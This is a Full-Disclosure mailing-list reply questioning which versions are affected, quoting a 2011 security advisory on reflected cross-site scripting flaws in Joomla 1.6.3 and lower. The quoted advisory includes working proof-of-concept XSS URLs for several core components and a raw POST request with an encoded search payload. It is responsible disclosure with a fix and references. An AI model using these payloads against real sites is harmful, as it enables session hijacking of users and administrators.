[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <BANLkTintwD4a6_CLTu_NWvzO+bJeMCxWeA@mail.gmail.com>
Date: Tue, 28 Jun 2011 08:33:14 +0200
From: Christian Sciberras <uuf6429@...il.com>
To: YGN Ethical Hacker Group <lists@...g.net>
Cc: vuln@...urity.nnov.ru, vuln@...unia.com, news@...uriteam.com,
secalert@...urityreason.com, bugs@...uritytracker.com,
full-disclosure@...ts.grok.org.uk, bugtraq@...urityfocus.com,
moderators@...db.org
Subject: Re: Joomla! 1.6.3 and lower | Multiple Cross Site
Scripting (XSS) Vulnerabilities
I've tested the PoCs on 1.5.22 and some 1.0 sites, and I consistently get a
403 error.
Perhaps by "1.6.3 and lower" you meant 1.6.x?
Cheers,
Chris.
On Tue, Jun 28, 2011 at 8:25 AM, YGN Ethical Hacker Group <lists@...g.net>wrote:
> Joomla! 1.6.3 and lower | Multiple Cross Site Scripting (XSS)
> Vulnerabilities
>
>
>
> 1. OVERVIEW
>
> Joomla! 1.6.3 and lower are vulnerable to multiple Cross Site Scripting
> issues.
>
>
> 2. BACKGROUND
>
> Joomla is a free and open source content management system (CMS) for
> publishing content on the World Wide Web and intranets. It comprises a
> model–view–controller (MVC) Web application framework that can also be
> used independently.
> Joomla is written in PHP, uses object-oriented programming (OOP)
> techniques and software design patterns, stores data in a MySQL
> database, and includes features such as page caching, RSS feeds,
> printable versions of pages, news flashes, blogs, polls, search, and
> support for language internationalization.
>
>
> 3. VULNERABILITY DESCRIPTION
>
> Several parameters (QueryString, option, searchword) in Joomla! Core
> components (com_content, com_contact, com_newsfeeds, com_search) are
> not properly sanitized upon submission to the /index.php url, which
> allows attacker to conduct Cross Site Scripting attack. This may allow
> an attacker to create a specially crafted URL that would execute
> arbitrary script code in a victim's browser.
>
>
> 4. VERSION AFFECTED
>
> 1.6.3 and lower
>
>
> 5. PROOF-OF-CONCEPT/EXPLOIT
>
>
> component: com_contact , parameter: QueryString (Browser: All)
> ===============================================================
>
>
> http://attacker.in/joomla163_noseo/index.php?option=com_contact&view=category&catid=26&id=36&Itemid=-1
> "><script>alert(/XSS/)</script>
>
>
> component:com_content , parameter: QueryString (Browser: All)
> ===============================================================
>
>
> http://attacker.in/joomla163_noseo/index.php?option=com_content&view=category&id=19&Itemid=260&limit=10&filter_order_Dir=&limitstart=&filter_order=
> ><script>alert(/XSS/)</script>
>
>
> component: com_newsfeeds , parameter: QueryString (Browser: All)
> =================================================================
>
>
> http://attacker.in/joomla163_noseo/index.php?option=com_newsfeeds&view=category&id=17&whateverehere=
> "><script>alert(/XSS/)</script>&Itemid=253&limit=10&filter_order_Dir=ASC&filter_order=ordering
>
>
> parameter: option (Browser: All)
> ====================================
>
> http://attacker.in/joomla163_noseo/index.php?option=
> "><script>alert(/XSS/)</script>&task=reset.request
>
>
> component: com_search, parameter: searchword (Browser: IE, Konqueror)
> =====================================================================
>
> [REQUEST]
> POST /joomla163/index.php HTTP/1.1
> Referer: http://attacker.in/joomla163/
> User-Agent: Konqueror/4.5
> Cache-Control: no-cache
> Content-Type: application/x-www-form-urlencoded
> Host: attacker.in
> Accept-Encoding: gzip, deflate
> Content-Length: 125
>
>
> option=com_search&searchword='%2522%253C%252Fscript%253E%253Cscript%253Ealert(%252FXSS%252F)%253C%252Fscript%253E&task=search
> [/REQUEST]
>
> This searchword XSS was identified via source code:
>
> http://yehg.net/lab/pr0js/advisories/joomla/core/1.6.3/xss/XSS%20%5bMode=SEO,NON-SEO%5d/(searchword)_xss_vuln_code_portion.jpg
>
>
> 6. IMPACT
>
> Attackers can compromise currently logged-in user/administrator
> session and impersonate arbitrary user actions available under
> /administrator/ functions.
>
>
> 7. SOLUTION
>
> Upgrade to Joomla! 1.6.4 or higher
>
>
> 8. VENDOR
>
> Joomla! Developer Team
> http://www.joomla.org
>
>
> 9. CREDIT
>
> This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
> Ethical Hacker Group, Myanmar.
>
>
> 10. DISCLOSURE TIME-LINE
>
> 2011-05-26: notified vendor
> 2011-06-28: vendor released fix
> 2011-06-28: vulnerability disclosed
>
>
> 11. REFERENCES
>
> Original Advisory URL:
>
> http://yehg.net/lab/pr0js/advisories/joomla/core/[joomla_1.6.3]_cross_site_scripting(XSS)
> Vendor Advisory URL:
>
> http://developer.joomla.org/security/news/352-20110604-xss-vulnerability.html
> XSS FAQ: http://www.cgisecurity.com/xss-faq.html
> OWASP Top 10:
> http://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project
> CWE-79: http://cwe.mitre.org/data/definitions/79.html
>
>
> #yehg [2011-06-28]
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
Content of type "text/html" skipped
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists